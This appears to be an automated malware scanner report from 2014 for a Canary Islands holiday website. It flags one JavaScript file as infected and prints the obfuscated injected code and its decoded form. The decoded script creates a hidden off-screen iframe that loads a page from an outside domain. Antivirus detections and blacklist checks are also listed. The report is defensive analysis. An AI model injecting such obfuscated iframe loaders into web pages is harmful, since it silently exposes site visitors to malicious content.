New scan:

Malware Scanner report for vividcanaries.co.uk

Malicious/Suspicious/Total urls checked
1/0/18
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://vividcanaries.co.uk/
HTTP/1.1 302 Found
Connection: close
Date: Sat, 04 Oct 2014 20:01:43 GMT
Location: http://www.vividcanaries.co.uk/
Server: Apache/2.2.15 (CentOS)
Content-Length: 300
Content-Type: text/html; charset=iso-8859-1
clean
http://www.vividcanaries.co.uk/
200 OK
Content-Length: 13946
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/_script/swfobject.js
200 OK
Content-Length: 7692
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,10
... 191 bytes are skipped ...
101,98,38,94,105,107,102,35,103,94,101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;291-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}if(x&&f&&012===10)e(s);

Decoded script:



function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://miamiheattickets.com/http.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;

function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://miamiheattickets.com/http.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;

Antivirus reports:

Avast
JS:Redirector-ZK [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.BYF
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_IFRAME.SMRR
Emsisoft
Trojan.JS.Iframe.BYF (B)
Comodo
TrojWare.JS.iFrame.BRR
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.A
TrendMicro
JS_IFRAME.SMRR
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Iframe.BS
MicroWorld-eScan
Trojan.JS.Iframe.BYF
NANO-Antivirus
Trojan.Script.Iframe.vjblc
F-Secure
Trojan.JS.Iframe.BYF
F-Prot
JS/IFrame.QD
Norman
Iframe.PG
GData
Trojan.JS.Iframe.BYF
Commtouch
JS/IFrame.QD
BitDefender
Trojan.JS.Iframe.BYF

http://www.google-analytics.com/urchin.js
200 OK
Content-Length: 22678
Content-Type: text/javascript
clean
http://vividcanaries.co.uk/login.asp
HTTP/1.1 302 Found
Connection: close
Date: Sat, 04 Oct 2014 20:01:45 GMT
Location: http://www.vividcanaries.co.uk/login.asp
Server: Apache/2.2.15 (CentOS)
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
clean
http://www.vividcanaries.co.uk/login.asp
200 OK
Content-Length: 7512
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/register.asp
200 OK
Content-Length: 8310
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/destinations.asp
200 OK
Content-Length: 15295
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/flights.asp
200 OK
Content-Length: 11753
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/holidayServices.asp
200 OK
Content-Length: 11070
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/aboutus.asp
200 OK
Content-Length: 12298
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/contactus.asp
200 OK
Content-Length: 14205
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/myAccount.asp
HTTP/1.1 302 Object moved
Cache-Control: private
Connection: close
Date: Sat, 04 Oct 2014 20:05:12 GMT
Location: login.asp
Server: Microsoft-IIS/6.0
Content-Length: 130
Content-Type: text/html; charset=UTF-8
Set-Cookie: ASPSESSIONIDQAATASTC=CHABLEHDKEGMBFLNNMIPFNAO; path=/
X-Powered-By: ASP.NET
clean
http://www.vividcanaries.co.uk/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/contactdetails.asp
200 OK
Content-Length: 10591
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/index.asp
200 OK
Content-Length: 13946
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/holiday/Canary-Islands/All-Islands
200 OK
Content-Length: 11660
Content-Type: text/html
clean
http://www.vividcanaries.co.uk/holiday/Canary-Islands/Fuerteventura
200 OK
Content-Length: 25159
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vividcanaries.co.uk

Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 04 Oct 2014 20:01:43 GMT
Location: http://www.vividcanaries.co.uk/
Server: Apache/2.2.15 (CentOS)
Content-Length: 300
Content-Type: text/html; charset=iso-8859-1

...300 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vividcanaries.co.uk
Referer: http://www.google.com/search?q=vividcanaries.co.uk

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vividcanaries.co.uk

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vividcanaries.co.uk/

Result: vividcanaries.co.uk is not infected or malware details are not published yet.